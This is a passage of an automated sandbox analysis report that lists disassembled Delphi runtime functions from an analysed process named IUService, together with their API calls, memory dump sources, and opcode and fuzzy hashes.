                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                                                              • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(?,00000000,5001551A,?,?,?,00000000,00000000), ref: 500154EA
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154F3
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$String$System@@$Ansi$Char$qqrx20$From$InternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%Upper$Case$qqrx20Char$BuffLen$qqrr20Pos$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1811596575-0
                                                                                                                                            • Opcode ID: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                                                            • Instruction ID: c0b1a5ea2b56544e033e8cc658cc13535f1bdf9ea375e6b9a9d5c146db7ca2d2
                                                                                                                                            • Opcode Fuzzy Hash: f8655f718251c2dc71c6e2303aeecd35c5678775ca9ef57c7831b282cf33942c
                                                                                                                                            • Instruction Fuzzy Hash: 74F0E936705744AFEB01CAE4DC51B9DB7EDDB48210F518572F900D7341D6749E0086D4
                                                                                                                                            Function 5001C5A4 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5C7
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5D5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                                                              • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                                                              • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C5E0
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Stringx20Sysutils@$Delimiter$qqrx20$Asg$qqrr20Path$Cat$qqrr20Cat3$qqrr20Copy$qqrx20ExtractFileIncludeLastName$qqrx20StringiStringiiStringt1Stringt2Trailing
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4289416924-0
                                                                                                                                            • Opcode ID: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                                                            • Instruction ID: 57fd14a13350398e88c99b23b071614aa93d96e5052488e5150640dac515cbaf
                                                                                                                                            • Opcode Fuzzy Hash: cbb00767dfdef57c8a6a94f2a97003c90a3088f6f5a0bed04f05ac7a6cd57dea
                                                                                                                                            • Instruction Fuzzy Hash: ABF0BE35305384ABE711DAA5EC51E8AB7ADEBC9620FA14666B904E3341D974EE0085A4
                                                                                                                                            Function 5002889C Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                                                              • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                                                              • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                                                            • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                                                              • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714845271-0
                                                                                                                                            • Opcode ID: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                                                            • Instruction ID: 3b1375f16a59b80594c295dcd8003e2593a585a6f493d83d981e7d870c7d49f9
                                                                                                                                            • Opcode Fuzzy Hash: 5ad6f6ad8a74d05bca40f67ae65e425fd22752f68b44519822e8c10b39ad4a31
                                                                                                                                            • Instruction Fuzzy Hash: EBF08936705344BFDB01DAE4ED51BDEB7EDDF48610F5145B2F900D3641D6749E408694
                                                                                                                                            Function 500265E8 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2203270808-0
                                                                                                                                            • Opcode ID: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                                                            • Instruction ID: 5c853f4ed2ac0c9bc1a77cb935357e7c10a3e6514227e9817a7166fb08a22db9
                                                                                                                                            • Opcode Fuzzy Hash: 8a06c8108bb7d8ccefdc9901acd0eb074360c6541fd827dabcbd55e415eef1b7
                                                                                                                                            • Instruction Fuzzy Hash: D6F0B431605589AFD710CA94EC52D5EB7ADEB8A660FA18372F90893640DA31AE05C691
                                                                                                                                            Function 50021698 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216C2
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216CA
                                                                                                                                            • @Sysutils@TextToFloat$qqrpcpv20Sysutils@TFloatValuerx24Sysutils@TFormatSettings.RTL120(?,00000000,500216F0,?,?,?,?,00000000), ref: 500216D3
                                                                                                                                              • Part of subcall function 50021580: @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500216F7,?,?,?,00000000), ref: 500216EA
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Sysutils@$AnsiStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFloatFloat$qqrpcpv20FormatFreeFromMem$qqrpvPower10$qqrvSettingsSystem@T$us$i0$%T$us$i0$%pbusTextValuerx24
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3176001047-0
                                                                                                                                            • Opcode ID: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                                                            • Instruction ID: 9fd13c48b86fe8ba40560011224ed825752708d08ad58dc217336ba303494022
                                                                                                                                            • Opcode Fuzzy Hash: 096e108351b0c95bdd88cef74aa5ff209f8a2702cfba72334109f8fd92193702
                                                                                                                                            • Instruction Fuzzy Hash: 43F02731305244ABE704CAA5FC61A9EB7EEEFE9640FA64176F505C3741DA70AD018694
                                                                                                                                            Function 50028834 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 50028854
                                                                                                                                              • Part of subcall function 50019F4C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019FD0), ref: 50019F85
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019FD0), ref: 50019F98
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019FD0), ref: 50019FA3
                                                                                                                                              • Part of subcall function 50019F4C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019FD0), ref: 50019FAF
                                                                                                                                              • Part of subcall function 50019F4C: CharLowerBuffW.USER32(00000000,?,00000000,50019FD0), ref: 50019FB5
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,5002888D,?,?,?,00000000,00000000), ref: 50028862
                                                                                                                                            • @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,5002888D,?,?,?,00000000,00000000), ref: 5002886B
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019BF4
                                                                                                                                              • Part of subcall function 50019BD4: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C09
                                                                                                                                              • Part of subcall function 50019BD4: @System@@LStrArrayClr$qqrpvi.RTL120(?,00000000,00000000,500288D8,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 50019C5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$Ansi$From$LowerStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Case$qqrx20CharChar$qqrx20$ArrayBuffClr$qqrpviCompareInternalLen$qqrr20Str$qqrx20StringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2714845271-0
                                                                                                                                            • Opcode ID: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                                                            • Instruction ID: 78bc52d133ef3eee87fb56faae3835f84c1f75803b4e5c0fcda7dd3ba297cfd4
                                                                                                                                            • Opcode Fuzzy Hash: 305cfe6e8fe4599ad0224e3db809e64d7292e10cee766da07364fbdc4708b33c
                                                                                                                                            • Instruction Fuzzy Hash: 5CF05E39705688BBEB01DAA4EC91F9EB7EDDB88610F9186B2F500D7641E674AE008694
                                                                                                                                            Function 50026914 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026923
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 50026941
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002696D,?,?,?,?,00000000), ref: 5002694C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Asg$qqrr20ClassClassoCreate$qqrp17LoadMetaStr$qqriStringStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1550118436-0
                                                                                                                                            • Opcode ID: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                                                            • Instruction ID: 078013d5af54c5226b3ab0755ea7a38ccff1b0ce4df6d013d20a1ea011b46d79
                                                                                                                                            • Opcode Fuzzy Hash: 034090b49bb97b67128a40d4687890c5d9aaa484eac5c38350ac9ee2cffa029a
                                                                                                                                            • Instruction Fuzzy Hash: 12F05971500685BFD700CF64EC52C5AB7ACEB86710F918372F90897340EB31AE04C6D0
                                                                                                                                            Function 500043E4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LGetDir$qqrucr27System@%AnsiStringT$us$i0$%.RTL120(00000000,50004446), ref: 50004409
                                                                                                                                              • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                                                              • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                                                              • Part of subcall function 500042F0: GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                                                              • Part of subcall function 500042F0: SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                                                              • Part of subcall function 500042F0: @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                                                            • @System@@LStrToString$qqrv.RTL120(00000000,50004446), ref: 5000441C
                                                                                                                                              • Part of subcall function 50008BDC: @System@Move$qqrpxvpvi.RTL120(?,50004421,00000000,50004446), ref: 50008BF2
                                                                                                                                            • @System@@PStrNCpy$qqrp28System@%SmallString$iuc$255%t1uc.RTL120(00000000,50004446), ref: 5000442B
                                                                                                                                              • Part of subcall function 50004F14: @System@Move$qqrpxvpvi.RTL120(?,50004430,00000000,50004446), ref: 50004F26
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000444D), ref: 50004440
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$CurrentDirectory$System@%$AnsiMove$qqrpxvpviStringSystem@$Array$qqrr27Clr$qqrpvCpy$qqrp28Dir$qqrucr27FreeFromMem$qqrpvSmallString$iuc$255%t1ucString$qqrvT$us$i0$%T$us$i0$%pcius
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 506161246-0
                                                                                                                                            • Opcode ID: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                                                            • Instruction ID: 1f1c8239afc9ae75611213fcacec5c0f4d323074735c47231db78d41111fae57
                                                                                                                                            • Opcode Fuzzy Hash: 692566ae1197cd59d330c93bd91ad5e67e88b7571903b626b87b6deb05836648
                                                                                                                                            • Instruction Fuzzy Hash: 6EF0E9B0A042489FE714DF95EDA199EB3BAFBC8300FD042BAA90493741DB741F048595
                                                                                                                                            Function 5002151C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,50021570,?,?,?,?,00000000,?,50021D4E,?,?,5001B7B7), ref: 50021542
